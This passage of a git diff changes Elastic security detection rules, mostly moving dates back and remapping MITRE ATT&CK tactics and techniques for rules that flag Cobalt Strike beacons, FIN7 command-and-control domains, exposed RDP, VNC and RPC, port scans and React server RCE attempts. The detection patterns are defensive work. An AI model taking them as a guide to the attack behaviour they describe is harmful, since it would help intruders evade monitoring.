@@ Telnet, a protocol for remote command-line access, is often used in legacy syste risk_score = 47 rule_id = "34fde489-94b0-4500-a76f-b8a157cf9269" severity = "medium" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: SonicWall", "Data Source: Suricata", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Lateral Movement", + "Tactic: Initial Access", + "Data Source: PAN-OS", + "Data Source: Fortinet", + "Data Source: SonicWall", + "Data Source: Suricata", + "Resources: Investigation Guide", +] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -93,25 +104,32 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/command_and_control_cobalt_strike_beacon.toml b/rules/network/command_and_control_cobalt_strike_beacon.toml index 025c8ebf198..c5d168d66d3 100644 --- a/rules/network/command_and_control_cobalt_strike_beacon.toml +++ b/rules/network/command_and_control_cobalt_strike_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -82,28 +82,24 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" - [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml index 5afb949f418..3e98f2fdb7b 100644 --- a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml +++ b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/22" [rule] author = ["Elastic"] @@ -87,28 +87,19 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat.technique]] -id = "T1573" -name = "Encrypted Channel" -reference = "https://attack.mitre.org/techniques/T1573/" -[[rule.threat.technique.subtechnique]] -id = "T1573.002" -name = "Asymmetric Cryptography" -reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_fin7_c2_behavior.toml b/rules/network/command_and_control_fin7_c2_behavior.toml index 8a8e20de3b8..038ab832275 100644 --- a/rules/network/command_and_control_fin7_c2_behavior.toml +++ b/rules/network/command_and_control_fin7_c2_behavior.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -43,28 +43,24 @@ destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destinati [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" - [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_halfbaked_beacon.toml b/rules/network/command_and_control_halfbaked_beacon.toml index 929355c8b37..1330bc27526 100644 --- a/rules/network/command_and_control_halfbaked_beacon.toml +++ b/rules/network/command_and_control_halfbaked_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -80,18 +80,24 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1568" +name = "Dynamic Resolution" +reference = "https://attack.mitre.org/techniques/T1568/" [[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_nat_traversal_port_activity.toml b/rules/network/command_and_control_nat_traversal_port_activity.toml index 8a8f0d1a7d7..e70052c7f23 100644 --- a/rules/network/command_and_control_nat_traversal_port_activity.toml +++ b/rules/network/command_and_control_nat_traversal_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -75,12 +75,8 @@ IPSEC NAT Traversal facilitates secure VPN communication across NAT devices by e [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/command_and_control_port_26_activity.toml b/rules/network/command_and_control_port_26_activity.toml index 68fd2ce302f..2f266661300 100644 --- a/rules/network/command_and_control_port_26_activity.toml +++ b/rules/network/command_and_control_port_26_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -75,22 +75,20 @@ SMTP, typically operating on port 25, is crucial for email transmission. However [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.003" -name = "Mail Protocols" -reference = "https://attack.mitre.org/techniques/T1071/003/" - -[[rule.threat.technique]] -id = "T1571" -name = "Non-Standard Port" -reference = "https://attack.mitre.org/techniques/T1571/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml index 543c85bbf79..1c67c535c25 100644 --- a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml +++ b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "8c1bdde8-4204-45c0-9e0c-c85ca3902488" severity = "medium" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -113,12 +113,32 @@ RDP allows administrators to remotely manage systems, but exposing it to the int [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml index d484d333516..bdb7850821e 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "5700cb81-df44-46aa-a5d7-337798f53eb8" severity = "high" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Command and Control", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -108,26 +108,26 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1219" +name = "Remote Access Tools" +reference = "https://attack.mitre.org/techniques/T1219/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml index da5ce08b9b3..99c927ca904 100644 --- a/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml +++ b/rules/network/command_and_control_vnc_virtual_network_computing_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -109,18 +109,14 @@ VNC is a tool that allows remote control of computers, often used by administrat [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" -[[rule.threat.technique.subtechnique]] -id = "T1219.003" -name = "Remote Access Hardware" -reference = "https://attack.mitre.org/techniques/T1219/003/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/network/discovery_potential_network_sweep_detected.toml b/rules/network/discovery_potential_network_sweep_detected.toml index e466d21230d..0659815cbd5 100644 --- a/rules/network/discovery_potential_network_sweep_detected.toml +++ b/rules/network/discovery_potential_network_sweep_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -22,7 +22,14 @@ name = "Potential Network Sweep Detected" risk_score = 21 rule_id = "781f8746-2180-4691-890c-4c96d11ca91d" severity = "low" -tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = [ + "Domain: Network", + "Tactic: Discovery", + "Tactic: Reconnaissance", + "Use Case: Network Security Monitoring", + "Data Source: PAN-OS", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "threshold" query = ''' @@ -83,6 +90,25 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + [rule.threshold] field = ["source.ip"] value = 1 diff --git a/rules/network/discovery_potential_port_scan_detected.toml b/rules/network/discovery_potential_port_scan_detected.toml index 39833c138f6..872921d9502 100644 --- a/rules/network/discovery_potential_port_scan_detected.toml +++ b/rules/network/discovery_potential_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -22,7 +22,14 @@ name = "Potential Network Scan Detected" risk_score = 21 rule_id = "0171f283-ade7-4f87-9521-ac346c68cc9b" severity = "low" -tags = ["Domain: Network", "Use Case: Network Security Monitoring", "Tactic: Discovery", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = [ + "Domain: Network", + "Tactic: Discovery", + "Tactic: Reconnaissance", + "Use Case: Network Security Monitoring", + "Data Source: PAN-OS", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "esql" @@ -90,3 +97,21 @@ reference = "https://attack.mitre.org/techniques/T1046/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/network/discovery_potential_syn_port_scan_detected.toml b/rules/network/discovery_potential_syn_port_scan_detected.toml index 10e3cd3c7c2..42cfe232eed 100644 --- a/rules/network/discovery_potential_syn_port_scan_detected.toml +++ b/rules/network/discovery_potential_syn_port_scan_detected.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/17" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -93,10 +93,16 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + [rule.threshold] field = ["destination.ip", "source.ip"] value = 1 diff --git a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml index 1480a6797d8..83e4f3cdfb2 100644 --- a/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml +++ b/rules/network/initial_access_fortigate_sso_login_from_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/28" integration = ["fortinet_fortigate"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/28" [rule] author = ["Elastic"] @@ -95,23 +95,19 @@ FROM logs-fortinet_fortigate.* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/initial_access_react_server_components_rce_attempt.toml b/rules/network/initial_access_react_server_components_rce_attempt.toml index 6acf88afcb6..3742e5f28eb 100644 --- a/rules/network/initial_access_react_server_components_rce_attempt.toml +++ b/rules/network/initial_access_react_server_components_rce_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] @@ -93,31 +93,31 @@ network where http.request.method == "POST" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/network/initial_access_react_server_rce_network_alerts.toml b/rules/network/initial_access_react_server_rce_network_alerts.toml index 0005908b26e..c319a5afcc6 100644 --- a/rules/network/initial_access_react_server_rce_network_alerts.toml +++ b/rules/network/initial_access_react_server_rce_network_alerts.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["panw", "cisco_ftd", "fortinet_fortigate", "suricata"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -55,7 +55,20 @@ references = [ risk_score = 73 rule_id = "1aefed68-eecd-47cc-9044-4a394b60061d" severity = "high" -tags = ["Domain: Network", "Domain: Application", "Domain: Web", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Initial Access", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: Suricata", "Data Source: Cisco FTD", "Resources: Investigation Guide"] +tags = [ + "Domain: Network", + "Domain: Application", + "Domain: Web", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: PAN-OS", + "Data Source: Fortinet", + "Data Source: Suricata", + "Data Source: Cisco FTD", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -69,13 +82,31 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml index 57bd58826e7..492129f623e 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/02" [rule] author = ["Elastic"] @@ -101,13 +101,14 @@ RPC enables remote management and resource sharing, crucial for system administr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml index c2559471478..2072a632c94 100644 --- a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml +++ b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 73 rule_id = "32923416-763a-4531-bb35-f33b9232ecdb" severity = "high" -tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Domain: Endpoint", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -100,26 +100,14 @@ RPC enables remote management and resource sharing across networks, crucial for [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml index 0d15c5e57be..18f1e6a95d9 100644 --- a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml +++ b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 47 rule_id = "c82b2bd8-d701-420c-ba43-f11a155b681a" severity = "medium" -tags = ["Domain: Network", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: PAN-OS", "Resources: Investigation Guide"] +tags = ["Tactic: Initial Access", "Domain: Network", "Use Case: Threat Detection", "Data Source: PAN-OS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -101,16 +101,30 @@ SMB, a protocol for sharing files and resources within trusted networks, is vuln [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + + [rule.new_terms] field = "new_terms_fields" value = ["source.ip"] diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml index d3e5aeaf8b8..3e4f65b7211 100644 --- a/rules/network/initial_access_unsecure_elasticsearch_node.toml +++ b/rules/network/initial_access_unsecure_elasticsearch_node.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/11" integration = ["network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -66,7 +66,7 @@ references = [ risk_score = 47 rule_id = "31295df3-277b-4c56-a1fb-84e31b4222a9" severity = "medium" -tags = ["Use Case: Threat Detection", "Domain: Endpoint", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Tactic: Initial Access", "Domain: Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -79,13 +79,14 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml index 41db6231b23..d38cd884d91 100644 --- a/rules/promotions/credential_access_endgame_cred_dumping_detected.toml +++ b/rules/promotions/credential_access_endgame_cred_dumping_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -73,13 +73,19 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/promotions/endgame_ransomware_detected.toml b/rules/promotions/endgame_ransomware_detected.toml index f52d51ab54c..9f8c169466d 100644 --- a/rules/promotions/endgame_ransomware_detected.toml +++ b/rules/promotions/endgame_ransomware_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/03/21" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this 